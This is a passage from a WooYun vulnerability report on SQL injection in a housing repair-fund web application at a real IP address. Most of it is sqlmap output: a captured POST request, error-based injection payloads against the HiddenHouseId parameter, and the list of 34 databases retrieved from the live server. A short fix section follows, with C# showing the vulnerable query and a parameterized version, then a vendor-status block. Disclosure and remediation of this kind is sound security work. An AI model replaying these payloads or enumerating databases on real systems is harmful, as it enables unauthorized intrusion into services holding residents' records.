web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[09:36:15] [INFO] fetching database names
[09:36:15] [INFO] fetching number of databases
[09:36:15] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:37:18] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
4
[09:37:59] [INFO] adjusting time delay to 4 seconds due to good response times
6
[09:38:30] [INFO] retrieved: ASPStat
[09:45:15] [INFO] adjusting time delay to 3 seconds due to good response times
e
[09:46:36] [INFO] retrieved: baobiao
[09:53:21] [INFO] retrieved: house
[09:58:35] [INFO] retrieved: House_DzdaImg1
[10:11:43] [INFO] retrieved: House_DzdaI
[10:22:32] [ERROR] invalid character detected. retrying..
[10:22:32] [WARNING] increasing time delay to 4 seconds
mg10
[10:26:58] [INFO] retrieved: House_DzdaImg11
[10:41:45] [INFO] retrieved: House_DzdaImg1
5. POST /Wxzj/RepairQuery/OwnerSearchByName.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://221.10.67.197/Wxzj/RepairQuery/OwnerSearchByName.aspx
Content-Length: 785
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=srddyba53ludf255w44xecrf
Host: 221.10.67.197
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgK1jY7CDgK/1IjCDgL5%2bLqdCQLIr5/ACALQysnjAwLPj%2b2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeTamt6G1z5%2bOyrqwqEBhs4hfVisk%3d&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u%2bafpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uToP6%2bZv77PjBNc7R5AQNJwm86qQ%3d%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: HiddenHouseId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1') AND 4626=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR(100)+CHAR(97)+CHAR(58
)+(SELECT (CASE WHEN (4626=4626) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR
(103)+CHAR(120)+CHAR(115)+CHAR(58))) AND ('EHZS'='EHZS&hiddenId=&hplusMoney=0.00
&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSea
rchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUM
ENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLd9+nDBQK/1IjCDgL5+LqdCQLIr5/ACALQys
njAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5
fDCQLl7LSbDAKsjPiFBgKFuZQeAQGG6wKrTKTu6HUfjksiL4m4xHE=&__VIEWSTATE=/wEPDwULLTExN
jY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivo
mQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkA
isPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uNc
F4ENH7hIoFBuwamC0W4foylvA==
---
[10:35:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[10:35:21] [INFO] fetching database names
[10:35:25] [INFO] the SQL query used returns 33 entries
[10:35:32] [WARNING] reflective value(s) found and filtering out
[10:39:05] [INFO] retrieved: repairhousefund
[10:39:11] [INFO] retrieved: master
[10:39:16] [INFO] retrieved: tempdb
[10:39:21] [INFO] retrieved: model
[10:39:26] [INFO] retrieved: msdb
[10:39:31] [INFO] retrieved: ReportServer
[10:39:36] [INFO] retrieved: ReportServerTempDB
[10:39:41] [INFO] retrieved: ASPState
[10:39:46] [INFO] retrieved: House
[10:39:51] [INFO] retrieved: House_DzdaImg1
[10:39:56] [INFO] retrieved: House_DzdaImg10
[10:40:00] [INFO] retrieved: House_Eval
[10:40:06] [INFO] retrieved: zfbz
[10:40:10] [INFO] retrieved: ZLGL
[10:40:16] [INFO] retrieved: HouseFGJ
[10:40:21] [INFO] retrieved: repairhousefund
[10:40:26] [INFO] retrieved: House_DzdaImg11
[10:40:31] [INFO] retrieved: Lz_Zl
[10:40:36] [INFO] retrieved: House_DzdaImg12
[10:40:41] [INFO] retrieved: distribution
[10:40:46] [INFO] retrieved: House_DzdaImg13
[10:40:51] [INFO] retrieved: House_DzdaImg14
[10:40:56] [INFO] retrieved: House_DzdaImg15
[10:41:01] [INFO] retrieved: House_DzdaImg2
[10:41:06] [INFO] retrieved: House_DzdaImg3
[10:41:11] [INFO] retrieved: house_pg
[10:41:16] [INFO] retrieved: House_DzdaImg4
[10:41:21] [INFO] retrieved: House_DzdaImg5
[10:41:25] [INFO] retrieved: house_wz
[10:41:30] [INFO] retrieved: House_DzdaImg6
[10:41:35] [INFO] retrieved: House_DzdaImg7
[10:41:40] [INFO] retrieved: House_DzdaImg8
[10:41:45] [INFO] retrieved: House_DzdaImg9
[10:41:50] [INFO] retrieved: House_TelInfo
[10:41:55] [INFO] retrieved:
available databases [34]:
[*] ASPState
[*] distribution
[*] House
[*] House_DzdaImg1
[*] House_DzdaImg10
[*] House_DzdaImg11
[*] House_DzdaImg12
[*] House_DzdaImg13
[*] House_DzdaImg14
[*] House_DzdaImg15
[*] House_DzdaImg2
[*] House_DzdaImg3
[*] House_DzdaImg4
[*] House_DzdaImg5
[*] House_DzdaImg6
[*] House_DzdaImg7
[*] House_DzdaImg8
[*] House_DzdaImg9
[*] House_Eval
[*] house_pg
[*] House_TelInfo
[*] house_wz
[*] HouseFGJ
[*] Lz_Zl
[*] master
[*] model
[*] msdb
[*] repairhousefund
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] zfbz
[*] ZLGL

Proof of vulnerability:

Already demonstrated above.

Fix recommendation:

Filter the input.
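As an added illustration (not code from the report or from the vendor's system), the C# below contrasts the query shape implied by the payloads above, a HiddenHouseId value concatenated inside a quoted, parenthesised condition, with a parameterized version; the Owner table, its columns and the id format are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

public static class OwnerSearch
{
    // Hypothetical reconstruction of the vulnerable pattern the report describes:
    // the POST value is pasted straight into the SQL text. Every sqlmap payload
    // above starts with "1')", which is exactly what closes this quote and
    // parenthesis, so the remainder of the payload is parsed as SQL.
    public static string BuildVulnerableSql(string hiddenHouseId)
    {
        return "SELECT OwnerName, HouseNo FROM Owner WHERE (HouseId = '"
             + hiddenHouseId + "')";
    }
    // With hiddenHouseId = "1'); WAITFOR DELAY '0:0:5';--" the text becomes
    //   SELECT ... WHERE (HouseId = '1'); WAITFOR DELAY '0:0:5';--')
    // and SQL Server executes the second statement: that is the 5-second delay
    // sqlmap measured in the "stacked queries" and "time-based blind" findings.

    // Corrected version. The value is bound as a typed parameter, so the driver
    // ships it as data and any quotes, parentheses, semicolons or WAITFOR inside
    // it are never interpreted as SQL. Table, column and parameter length are
    // assumptions for illustration.
    public static DataTable FindOwner(SqlConnection conn, string hiddenHouseId)
    {
        // Defence in depth: the benign requests above send "1", so reject anything
        // that is not a short alphanumeric token (adjust to the real id format).
        if (string.IsNullOrEmpty(hiddenHouseId) || hiddenHouseId.Length > 20)
            throw new ArgumentException("HiddenHouseId has an unexpected length");
        foreach (char c in hiddenHouseId)
        {
            if (!char.IsLetterOrDigit(c))
                throw new ArgumentException("HiddenHouseId has an unexpected format");
        }

        const string sql =
            "SELECT OwnerName, HouseNo FROM Owner WHERE HouseId = @HouseId";
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@HouseId", SqlDbType.NVarChar, 20).Value = hiddenHouseId;
            DataTable result = new DataTable();
            using (SqlDataAdapter adapter = new SqlDataAdapter(cmd))
            {
                adapter.Fill(result);
            }
            return result;
        }
    }
}
```

The database listings above also show that the application's SQL login can see every database on the server, including master, msdb and other House_* instances; running the site under a login restricted to its own database would limit what a successful injection can reach.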

Copyright notice: when reposting, please credit the source: Mr.leo@乌云 (WooYun)


Vendor Response

Vendor response:

Severity: High

Vulnerability rank: 17

Confirmed: 2014-10-16 09:06

Vendor reply:

Latest status:

None yet

